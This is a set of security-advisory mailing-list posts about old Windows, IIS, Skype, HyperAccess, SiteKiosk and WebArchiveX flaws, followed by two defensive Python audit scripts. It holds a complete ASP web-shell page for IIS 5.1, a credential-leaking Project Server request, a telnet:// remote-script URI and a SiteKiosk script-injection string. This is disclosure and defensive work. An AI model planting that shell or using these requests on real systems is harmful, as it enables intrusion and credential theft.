= http://www.microsoft.com/technet/security/bulletin/MS07-005.mspx
=
= Affected Software:
=Microsoft Windows 2000
=Microsoft Windows XP  
=Microsoft Windows Server 2003
=
= Public disclosure on February 14, 2007


== Overview ==

When thinking about buffer overflow vulnerabilities, a file can sometimes
be as harmful as a packet. Even though past security issues have taught
us that it is unwise to use a string from a file/packet without first
checking its length, this is what happened here.

MS Interactive Training will open a file with a .cbo extension and read 
in the Syllabus details.

Through the creation of a corrupt file, with a long Syllabus string it is
possible to gain control of EIP and execute arbitrary code.

== Exploitation ==

Remote exploitation through Internet Explorer can be obtained through 
hosting a malicious .cbo file which will be downloaded and opened 
automatically.

== Solutions ==

- Install the vendor supplied patch.

== Credit ==

Discovered and advised to Microsoft May, 2006 by Brett Moore of
Security-Assessment.com

== About Security-Assessment.com ==

Security-Assessment.com is Australasia's leading team of Information 
Security consultants specialising in providing high quality Information 
Security services to clients throughout the Asia Pacific region. Our 
clients include some of the largest globally recognised companies in 
areas such as finance, telecommunications, broadcasting, legal and 
government. Our aim is to provide the very best independent advice and 
a high level of technical expertise while creating long and lasting 
professional relationships with our clients.

Security-Assessment.com is committed to security research and 
development, and its team continues to identify and responsibly publish 
vulnerabilities in public and private software vendors' products. 
Members of the Security-Assessment.com R&D team are globally recognised 
through their release of whitepapers and presentations related to new 
security research.



[Full-disclosure] Project Server 2003 - Credential Disclosure

2006-12-15 Thread Brett Moore
==
% Project Server 2003 - Credential Disclosure
==

Microsoft Project Server 2003 implements a thick client
for some of the functionality. The thick client uses
XML requests to talk to the server over HTTP(S).

One of these requests returns the username and password
of the MSProjectUser account used to access the SQL
database as well as other system information.

--
POST http://SERVER/projectserver/logon/pdsrequest.asp HTTP/1.0
Accept: */*
Accept-Language: en-nz
Pragma: no-cache
Host: SERVER
Content-length: 87
Proxy-Connection: Keep-Alive
Cookie: PjSessionID=valid cookie

<Request>
<GetInitializationData>
<Release>1</Release>
</GetInitializationData>
</Request>

<Reply>
<HRESULT>0</HRESULT>
<STATUS>0</STATUS>
<UserName>theuser</UserName>
<GetInitializationData>
<GetLoginInformation>
<DBType>0</DBType>
<DVR>{SQLServer}</DVR>
<DB>ProjectServer</DB>
<SVR>SERVER</SVR>
<ResGlobalID>1</ResGlobalID>
<ResGlobalName>resglobal</ResGlobalName>
<UserName>MSProjectUser</UserName>
<Password>sekretpass</Password>
<UserNTAccount>SERVER\USER</UserNTAccount>
</GetLoginInformation>
</Reply>
--

Some quick notes that mitigate this attack;
* The cookie must be a valid cookie, which is obtained via a 
  login with a valid username and password.
* Since the thick client is 'client side' any sql can be 
  manipulated anyway.
* The MSProjectUser should be a low level account anyway.
* Other 'undocumented' or 'unauthorised' requests 'may' also 
  be able to be made through this method.

==
% 
==



[Full-disclosure] ASP Cmd Shell On IIS 5.1

2006-12-13 Thread Brett Moore


% ASP Cmd Shell On IIS 5.1



ASP shells have been around since the dawn of time. On IIS 5.0 and prior
it was simple to create a 'command prompt shell' using code similar to;

<%
Set oS = Server.CreateObject("WSCRIPT.SHELL")
output = oS.exec("cmd.exe /c " & request("command")).stdout.readall
response.write output
%>

Permissions changes in IIS 5.1 prevented this method from working as 
execution access was revoked to the IUSR_Machine user.

During one boring afternoon it was decided to find a way around this,
and what we found was 'slightly' interesting.

When IIS checks to see if an executable has 'execute' rights it is 
checking against IUSR_Machine. If execute rights are granted then the 
new process is created, under the IWAM_Machine account. 

Thus all that was needed was an executable that could be run by
IUSR_Machine and would then spawn an instance of cmd.exe.

We set about seeing what executables could be run by IUSR_Machine. It
turns
out that execution access has been revoked to all files with the .exe
extension. We did however locate several .com files that could still be
executed. One in particular 'win.com' takes a command line as a
parameter
and will execute it.

Because of the 'double spawning' we can not make use of .stdout.readall,
and
need to revert to outputting to a file, and reading it back in.

Due to the process executing under a different account than that of the
ASP
processor, we need to jump through a couple of hoops. 
* The folder that we use must be WRITEABLE by IWAM_Machine
* The folder that we use must be READABLE by IUSR_Machine
* We need to alter file permissions to allow IUSR_Machine access to read

  the file created by IWAM_Machine

The accesschk tool from sysinternals, can easily identify a valid
location.
Our testings came up with c:\windows\pchealth\ERRORREP\QHEADLES\

IIS6.0 revokes access to both IUSR_Machine and IWAM_Machine, and
therefore
this technique will not work on that platform.



<%
Dim oS, oSNet, oFSys, oF, szCMD, szTF
On Error Resume Next
Set oS = Server.CreateObject("WSCRIPT.SHELL")
Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form("C")

If (szCMD <> "") Then
  ' Temporary output file in a folder writeable by IWAM_ and readable by IUSR_
  szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName()
  ' Here we do the command (win.com spawns cmd.exe, output redirected to the file)
  Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF & """", 0, True)
  response.write szTF
  ' Change perms so the ASP processor account can read the file
  Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G everyone:F", 0, True)
  Set oF = oFSys.OpenTextFile(szTF, 1, False, 0)
End If
%>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type="text" name="C" size="70" value="<%= szCMD %>">
<input type="submit" value="Run"></FORM><PRE>
Machine: <%= oSNet.ComputerName %><BR>
Username: <%= oSNet.UserName %><br>
<%
If (IsObject(oF)) Then
  On Error Resume Next
  Response.Write Server.HTMLEncode(oF.ReadAll)
  oF.Close
  ' Clean up the temporary file
  Call oS.Run("win.com cmd.exe /c del " & szTF, 0, True)
End If
%>








[Full-disclosure] HyperAccess - Multiple Vulnerabilities

2006-12-13 Thread Brett Moore
Not long now...


= Hyper Access - Multiple Vulnerabilities
=
= Vendor Website:  
= http://www.hilgraeve.com
=
= Affected Software:
=   Hyper Access 8.4 (and possibly lower)
=
= Public disclosure on Thursday December 14, 2006


== Overview ==

HyperAccess is the official FULL-POWERED upgrade from HyperTerminal and
HyperTerminal Private Edition. It is the product from which HyperTerminal
and HyperTerminal Private Edition are derived. HyperAccess offers a wide
array of additional capabilities, with a similar look and feel.

This advisory discloses two separate (but similar) security issues in
the latest version of HyperAccess.

* Command Execution Through .HAW Opening * 

HyperAccess saves 'sessions' as .haw files. These extensions are setup
to open without user intervention, through the editflags setting in the
registry key:

  HKEY_CLASSES_ROOT\HAWin32\EditFlags.

If a user, using Internet Explorer, browses to a web site that hosts a
.HAW, an automatic download and open can be forced. The file will be
opened and parsed by the installed version of HyperAccess.

A .HAW file can be saved with an option 'Script To Run Before Connecting'
and this can be setup to load a script file from either an SMB share or
a WEBDAV web share.

The script commands offered by HyperAccess include built in commands as
well as standard vbscript. This allows the creation of a script that
uses WScript.Shell to spawn other executables.

This attack requires the target to visit the attacker's website, and be
able to connect to the remote share.

A suggested fix is to remove/modify the editflags setting to prevent the
automatic opening and parsing of .HAW files.


* Command Execution Through Telnet URL Protocol *

HyperAccess sets up a URL Protocol to handle the telnet:// URL handler. 
This setting can be viewed in the registry key:
 
  HKEY_CLASSES_ROOT\telnet\shell\open\command 

which is set to 
  
  c:\program files\hawin32\hawin32.exe /t %1

HyperAccess will accept /r as a command line parameter to specify a
script file to run. This command can be passed on the URL through
Internet Explorer using a URL such as;

  telnet://IPADDRESS:PORT # /r \\SERVER\share\scriptfile.txt

Where SERVER is an SMB share or a WEBDAV web share hosting a malicious
script to run.

The script commands offered by HyperAccess include built in commands as
well as standard vbscript. This allows the creation of a script that
uses WScript.Shell to spawn other executables.

This attack requires the target to visit the attacker's website, and be
able to connect to the remote share.

A suggested fix is to remove the telnet handler from the registry.


== Solutions ==

Currently, the issues outlined in the report have been added to a 
list of issues to evaluate during the next update of HyperACCESS.
There is currently no planned date for this update.

== Credit ==

Discovered and advised to Hilgraeve November 10, 2006 by Brett Moore of
Security-Assessment.com

== About Security-Assessment.com ==

Security-Assessment.com is Australasia's leading team of Information 
Security consultants specialising in providing high quality Information 
Security services to clients throughout the Asia Pacific region. Our 
clients include some of the largest globally recognised companies in 
areas such as finance, telecommunications, broadcasting, legal and 
government. Our aim is to provide the very best independent advice and 
a high level of technical expertise while creating long and lasting 
professional relationships with our clients.

Security-Assessment.com is committed to security research and 
development, and its team continues to identify and responsibly publish 
vulnerabilities in public and private software vendor's products. 
Members of the Security-Assessment.com RD team are globally recognised 
through their release of whitepapers and presentations related to new 
security research.

Security-Assessment.com is an Endorsed Commonwealth Government of 
Australia supplier and sits on the Australian Government 
Attorney-General's Department Critical Infrastructure Project panel. 
We are certified by both Visa and MasterCard under their Payment 
Card Industry Data Security Standard Programs.



[Full-disclosure] [SBDA] SiteKiosk - FileSystem Access

2006-12-12 Thread Brett Moore
Still time before Christmas.


= SiteKiosk - FileSystem Access
=
= Vendor Website:  
= http://www.sitekiosk.com/
=
= Affected Software:
=   SiteKiosk  6.5.150
=
= Public disclosure on Tuesday December 12, 2006


== Overview ==

SiteKiosk is an application used to secure public access terminals. It
is designed to provide a safe and stable way for the use of public access
terminals with or without access to the Internet.

SiteKiosk is based on Internet Explorer and can be configured to
individually restrict access to Web sites, the operating system,
system settings, and applications. Your computer will be protected
against any manipulation from the time you boot until you shut it down.

SiteKiosk suffers from a cross site scripting vulnerability, that leads
to filesystem access.

== Exploitation ==

SiteKiosk implements a 'skinning' feature so that the layout and display
of the browser can be modified. The 'skinning' feature uses an HTML
aware control for the modified title bar of the main SiteKiosk window.

SiteKiosk displays the URL of the current location in the title bar of
the main window, and therefore any HTML code in the location will be
included in the title bar.

By default, SiteKiosk does not properly handle the ABOUT: prefix. The
URL is directly outputted to the screen leading to a normal cross site
scripting vulnerability.

Because the URL is also outputted to the title bar, script can be
executed under the LOCAL computer zone.

If a user types the following into the address box, or browses a site
that sets the location to;

  ABOUT:hello<a href="\">click here</a>

The title bar will display a hyperlink. By clicking on this HREF in the
main window's title bar, the filesystem will be accessed with an explorer
window.

SiteKiosk also installs some ActiveX controls that are marked 'safe
for scripting'. One of these controls exposes two dangerous methods that
allow a SiteKiosk user to read and download any file from the kiosk
with the permissions of the user running SiteKiosk.

== Solutions ==

A new version of SiteKiosk has been released that addresses these
vulnerabilities. It can be downloaded from http://www.sitekiosk.com.

== Credit ==

Discovered and advised to SiteKiosk November 30, 2006 by Brett Moore of
Security-Assessment.com

== About Security-Assessment.com ==

Security-Assessment.com is Australasia's leading team of Information 
Security consultants specialising in providing high quality Information 
Security services to clients throughout the Asia Pacific region. Our 
clients include some of the largest globally recognised companies in 
areas such as finance, telecommunications, broadcasting, legal and 
government. Our aim is to provide the very best independent advice and 
a high level of technical expertise while creating long and lasting 
professional relationships with our clients.

Security-Assessment.com is committed to security research and 
development, and its team continues to identify and responsibly publish 
vulnerabilities in public and private software vendor's products. 
Members of the Security-Assessment.com RD team are globally recognised 
through their release of whitepapers and presentations related to new 
security research.

Security-Assessment.com is an Endorsed Commonwealth Government of 
Australia supplier and sits on the Australian Government 
Attorney-General's Department Critical Infrastructure Project panel. 
We are certified by both Visa and MasterCard under their Payment 
Card Industry Data Security Standard Programs.



[Full-disclosure] ASP.DLL Include File Buffer Overflow

2006-07-19 Thread Brett Moore

= ASP.DLL Include File Buffer Overflow
=
= MS Bulletin posted: 
= http://www.microsoft.com/technet/security/Bulletin/MS06-034.mspx
=
= Affected Software:
=IIS 5.0
=IIS 5.1
=IIS 6.0
=
= Public disclosure on July 19, 2006


== Overview ==

A buffer overflow exists in ASP.DLL that can be exploited by creating
a .asp file containing a parameter for the include SSI command.

  <!-- #include file="long buffer" -->OVERFLOWDATA

The include function in ASP.DLL checks if the parameter is longer than
260 bytes. If it is then an error is caused, but before causing the
error a miscalculated copy is done.

  mov  edi, [ebp+var_228]    ; load length of parameter
  cmp  edi, 104h             ; check if larger than 260 bytes
  jbe  short loc_
  mov  esi, [ebp+var_22C]    ; load address of parameter
  lea  eax, [edi+esi-104h]   ; load eax with the address of the last
                             ; 260 bytes of the parameter
                             ; (length of string+source of string)-104h
  lea  edx, [ebp+var_211]    ; load edx with address on stack
  sub  edx, eax              ;
  mov  cl, [eax]             ;  \
  mov  [edx+eax], cl         ;   do the copy
  inc  eax                   ;   and overflow the stack
  test cl, cl                ;  /
  jnz  short loc_7096D1F3    ;

Funnily enough, the solution was to remove this copy as the resulting
data was never actually used.

== Exploitation ==

Exploitation requires the ability to upload or somehow create a file
with a .asp extension in a folder that will allow .asp processing.

Since ASP.DLL usually runs under the IWAM_ account, there is no
privilege escalation through this vulnerability. It is however possible
to bypass any security restrictions enforced by ASP. It also allows for
the execution of APIs that have no ASP equivalent.

== Solutions ==

- Install the vendor supplied patch.

== Credit ==

Discovered and advised to Microsoft February, 2006 by Brett Moore of
Security-Assessment.com

Same Bug Different App
http://www.security-assessment.com/Presentations/SBDA_Ruxcon_2005.ppt

In memory of;
  http://www.nsfocus.com/english/homepage/research/0305.htm
and
  http://www.eeye.com/html/research/advisories/AD20001003.html

== About Security-Assessment.com ==

Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors
products.

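The two ASP posts above describe things a reviewer of an IIS web root can look for: pages that build a command shell out of a WScript.Shell object, a .Run/.Exec call and request-supplied input (the "ASP Cmd Shell" post), and include directives whose parameter exceeds the 260-byte check in ASP.DLL (this post). The scanner below is an added example, not code from either post; the ASP sample it scans is constructed here and the indicator names are its own.

```python
"""Scan ASP source text for (a) server-side include directives whose
parameter is longer than the 260-byte limit named in the ASP.DLL advisory
and (b) the building blocks of a WScript.Shell command page.
Added example; the sample ASP below is constructed."""
import re
from typing import List, Tuple

Finding = Tuple[str, int, str]  # (kind, 1-based line number, detail)

# Parameter length that the advisory says ASP.DLL compares against (104h).
INCLUDE_LIMIT = 260

INCLUDE_RE = re.compile(
    r'<!--\s*#include\s+(file|virtual)\s*=\s*"?([^"\s>]*)"?\s*-->', re.IGNORECASE)
SHELL_OBJECT_RE = re.compile(
    r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.IGNORECASE)
SHELL_CALL_RE = re.compile(r'\.\s*(Run|Exec)\s*\(', re.IGNORECASE)
REQUEST_RE = re.compile(
    r'\bRequest\s*(\.\s*(Form|QueryString|Cookies|ServerVariables))?\s*\(',
    re.IGNORECASE)


def scan_asp(source: str) -> List[Finding]:
    """Return one finding per matching line, in file order."""
    findings: List[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in INCLUDE_RE.finditer(line):
            length = len(m.group(2).encode("utf-8"))
            if length > INCLUDE_LIMIT:
                findings.append(("long-include", lineno,
                                 f"{m.group(1)} parameter is {length} bytes "
                                 f"(> {INCLUDE_LIMIT})"))
        if SHELL_OBJECT_RE.search(line):
            findings.append(("shell-object", lineno, line.strip()))
        if SHELL_CALL_RE.search(line):
            findings.append(("shell-call", lineno, line.strip()))
        if REQUEST_RE.search(line):
            findings.append(("request-input", lineno, line.strip()))
    return findings


def verdict(findings: List[Finding]) -> List[str]:
    """Collapse line-level findings into file-level verdicts."""
    kinds = {kind for kind, _, _ in findings}
    verdicts: List[str] = []
    # All three ingredients together are what makes a page a command shell.
    if {"shell-object", "shell-call", "request-input"} <= kinds:
        verdicts.append("command-shell")
    if "long-include" in kinds:
        verdicts.append("overlong-include")
    return verdicts


# Constructed sample: a minimal shell page plus one normal and one
# overlong include directive (300 bytes, above the 260-byte check).
SAMPLE_ASP = (
    '<%\n'
    'Set oS = Server.CreateObject("WScript.Shell")\n'
    'szCMD = Request.Form("C")\n'
    'Call oS.Run("win.com cmd.exe /c " & szCMD, 0, True)\n'
    '%>\n'
    '<!-- #include file="header.inc" -->\n'
    '<!-- #include file="' + "A" * 300 + '" -->\n'
)

if __name__ == "__main__":
    found = scan_asp(SAMPLE_ASP)
    for kind, lineno, detail in found:
        print(f"{kind:14} line {lineno}: {detail}")
    print("verdict:", verdict(found))
```

Run it over each .asp file in a web root and treat a "command-shell" verdict as something to review by hand; the line-level findings are kept so a reviewer can see which lines triggered it. The include check measures the parameter in bytes rather than characters, which is what the length compare in ASP.DLL sees.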


[Full-disclosure] Skype - URI Handler Command Switch Parsing

2006-05-21 Thread Brett Moore

= Skype - URI Handler Command Switch Parsing
=
= Vendor Website: 
= http://www.skype.com
=
= Affected Version:
=   Skype for Windows:
= All releases prior to and including 2.0.*.104
= Release 2.5.*.0 to and including 2.5.*.78
=
= Public disclosure on May 22, 2006


== Overview ==

During the typical installation of the Windows Skype client, several
URI handlers are installed. This allows for easy access to the Skype
client through various URI types.

Due to a flaw in the handling of one of these types, it is possible to
include additional command line switches to be passed to the Skype
client. One of these switches will initiate a file transfer, sending 
the specified file to an arbitrary Skype user. 

== Exploitation ==

Exploitation occurs when the victim opens the exploit URI in Internet
Explorer. This requires the victim to visit a website under the
attacker's control, or to be convinced into opening a malicious HTML
page. Clicking on a link is not required, as this action can be
automated in various ways using scripting language.

For the attack to be successful the attacker must know the location
of the requested file on the victim's machine. One common target file
would be the victim's Skype configuration file.

For the file transfer to succeed the attacker must have authorised
the victim, which can be done by adding the victim to the attacker's
contact list. This does not require any authorisation from the
victim Skype user.

Other Skype command line switches could also be exploited to manipulate
or obtain the Skype user's credentials, under similar situations.
 
== Solutions ==

- Install the vendor supplied upgrade
  http://www.skype.com/security/skype-sb-2006-001.html
 
== Credit ==

Discovered and advised to Skype Limited May, 2006 by Brett Moore of
Security-Assessment.com

== About Security-Assessment.com ==

Security-Assessment.com is New Zealand's leading team of Information
Security consultants specialising in providing high quality Information
Security services to clients throughout Australasia. Our clients range
from small businesses to some of the largest globally recognized
companies. Security-Assessment.com has no vendor relationships and
positions itself as the only independent security assurance provider in
New Zealand.





[Full-disclosure] -Exploiting Freelist[0] On Windows XP Service Pack 2-

2005-12-07 Thread Brett Moore
-Exploiting Freelist[0] On Windows XP Service Pack 2-

Windows XP Service pack 2 introduced some new security measures in an
attempt to prevent the use of overwritten heap headers to do arbitrary
byte writing. This method of exploiting heap overflows, and the protection
offered by service pack 2, is widely known and has been well documented
in the past.

What this paper will attempt to explain is how other functionality of the
heap management code can be used to gain execution control after a chunk
header has been overwritten.

In particular this paper takes a look at exploiting freelist[0] overwrites.

It can currently be downloaded from our website
http://www.security-assessment.com/tech-1.htm

Brett Moore
Network Intrusion Specialist, CTO
Security-Assessment.com 


[Full-disclosure] WebArchiveX - Unsafe Methods Vulnerability

2005-09-06 Thread Brett Moore

= WebArchiveX - Unsafe Methods Vulnerability
=
= Vendor Website: 
= http://www.csystems.co.il/webarchivex/index.aspx
=
= Affected Version:
=WebArchiveX.dll 5.5.0.76 Installed Prior To Sep 6th, 2005
=
= Public disclosure on September 07, 2005


== Overview ==

The WebArchiveX component gives developers the ability to include .MHT
archive creation in their software and is compatible with a wide range
of programming languages.

Prior to September 6th 2005, the activeX component would install and
mark itself 'safe for scripting'. The component offers various methods
that when instantiated by a malicious web site, can be used to read files 
from, or write files to the local computer.

== Exploitation ==

The component has an extensive API that can be viewed online;
   http://www.csystems.co.il/WebArchiveX/help/api.html


This advisory concentrates on the two following methods;

* MakeArchive- Build MHT web archive (single MHT file)
  Boolean MakeArchive(
 String htmlFile,
 String userAgent,
 String mhtFile
   );

  The MakeArchive method will accept a local path as the mhtFile 
  parameter, allowing a malicious web site to write a file to the local
  drive. By writing to the startup folder, it is possible to create a 
  .mht that will be executed locally at startup.


* MakeArchiveStr - Build MHT web archive and returns it as a string
  String MakeArchiveStr(
 String htmlFile,
 String userAgent
   );

  The MakeArchiveStr method will accept a local path as the htmlFile
  parameter. After reading in the file, the contents will be returned
  to the calling script. This allows a malicious website to read the 
  contents of any file accessible by the current user.  

== Solutions ==

- The vendor has changed the default installation to remove the 'safe for
  scripting' entry, but unfortunately has not changed the version number.
  The download now includes a readme file that contains;

  Why WebArchiveX is not safe for scripting?
  --

  If WebArchiveX was safe for scripting, then malicious websites
  could use WebArchiveX in order to read/write files from/to your
  local file system. Please contact [EMAIL PROTECTED] for
  further details!

  In order to make WebArchiveX safe for scripting you can import
  the enclosed Registry file WebArchiveX_SafeForScripting.reg.

- To identify if this component is installed on your pc, search the 
  registry for WebArchiveX entries.

- If the entry is located, remove the 'safe for scripting' entry by
  removing these keys;
\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}
\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}

- For additional help contact [EMAIL PROTECTED]
 
== Credit ==

Discovered and advised to cSystems August, 2005 by Brett Moore of
Security-Assessment.com

== About Security-Assessment.com ==

Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors products.




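Three of the advisories above come down to registry state a defender can audit: the HyperAccess .HAW class whose EditFlags lets the file open without a prompt, the telnet:// and Skype URI protocol handlers whose shell\open\command receives attacker-controlled text, and the WebArchiveX component marked safe for scripting through the two Implemented Categories keys listed in that advisory. The audit below is an added example, not code from any of the advisories. It parses a .reg export and reports all three. Assumptions not stated on the page: the EditFlags bit it tests is FTA_OpenIsSafe (0x10000), the "unquoted %1" heuristic on handler commands is a general check rather than something the Skype advisory describes, and the sample export and its CLSID are constructed.

```python
"""Audit a Windows registry export (.reg text) for file classes that open
without a prompt, URL protocol handlers, and ActiveX controls registered
as safe for scripting/initialising.  Added example; the sample export is
constructed and the FTA_OpenIsSafe bit is an assumption, not from the page."""
import re
from typing import Dict, List, Tuple, Union

Value = Union[str, int]
RegKeys = Dict[str, Dict[str, Value]]
Finding = Tuple[str, str, str]  # (kind, subject, detail)

# Component categories listed in the WebArchiveX advisory.
CATID_SAFE_FOR_SCRIPTING = "{7DD95801-9882-11CF-9FA9-00AA006C42C4}"
CATID_SAFE_FOR_INITIALIZING = "{7DD95802-9882-11CF-9FA9-00AA006C42C4}"
# EditFlags bit FTA_OpenIsSafe: assumption that this is the "editflags
# setting" the HyperAccess advisory refers to.
FTA_OPEN_IS_SAFE = 0x00010000
HKCR = "HKEY_CLASSES_ROOT\\"


def decode_value(raw: str) -> Value:
    """Decode dword: and quoted-string values; other types stay as text."""
    if raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
        return re.sub(r"\\(.)", r"\1", raw[1:-1])   # \\ -> \  and  \" -> "
    return raw


def parse_reg(text: str) -> RegKeys:
    """Parse [key] headers and name=value lines of a .reg export."""
    keys: RegKeys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry"):
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            current = header.group(1)
            keys.setdefault(current, {})     # a key may carry no values at all
            continue
        value = re.match(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$', line)
        if current is None or not value:
            continue
        name = "@" if value.group(1) == "@" else value.group(1)[1:-1]
        keys[current][name] = decode_value(value.group(2))
    return keys


def audit(keys: RegKeys) -> List[Finding]:
    findings: List[Finding] = []
    for key, values in keys.items():
        if not key.startswith(HKCR):
            continue
        rel = key[len(HKCR):]
        top_level = "\\" not in rel
        # 1. File class that Internet Explorer opens without the download prompt.
        flags = values.get("EditFlags")
        if top_level and isinstance(flags, int) and flags & FTA_OPEN_IS_SAFE:
            findings.append(("open-is-safe", rel, f"EditFlags={flags:#x}"))
        # 2. URL protocol handler: report its command and whether %1 is quoted.
        if top_level and "URL Protocol" in values:
            cmd = str(keys.get(key + "\\shell\\open\\command", {}).get("@", ""))
            risk = "quoted %1" if '"%1"' in cmd else "unquoted %1"
            findings.append(("url-protocol", rel, f"{risk}: {cmd}"))
        # 3. COM class registered under a safe-for-scripting/initialising category.
        cat = re.match(r"CLSID\\(\{[0-9A-Fa-f-]+\})\\Implemented Categories\\"
                       r"(\{[0-9A-Fa-f-]+\})$", rel)
        if cat:
            catid = cat.group(2).upper()
            if catid == CATID_SAFE_FOR_SCRIPTING:
                findings.append(("safe-for-scripting", cat.group(1), catid))
            elif catid == CATID_SAFE_FOR_INITIALIZING:
                findings.append(("safe-for-initializing", cat.group(1), catid))
    return findings


# Constructed sample export (paths, CLSID and the mailto entry are made up).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\HAWin32]
@="HyperACCESS Session"
"EditFlags"=dword:00010000

[HKEY_CLASSES_ROOT\telnet]
@="URL:Telnet Protocol"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\telnet\shell\open\command]
@="\"c:\\program files\\hawin32\\hawin32.exe\" /t %1"

[HKEY_CLASSES_ROOT\mailto]
@="URL:MailTo Protocol"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\mailto\shell\open\command]
@="\"C:\\Example\\mailer.exe\" \"%1\""

[HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}]

[HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000001}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}]
"""

if __name__ == "__main__":
    for kind, subject, detail in audit(parse_reg(SAMPLE_REG)):
        print(f"{kind:22} {subject:40} {detail}")
```

Feed it the output of `reg export HKCR` from the machine under review. Every URL protocol handler is listed, not only the unquoted ones, because the point of the HyperAccess and Skype advisories is that any handler command that forwards the URL text to an application deserves a look; the quoting note only ranks them.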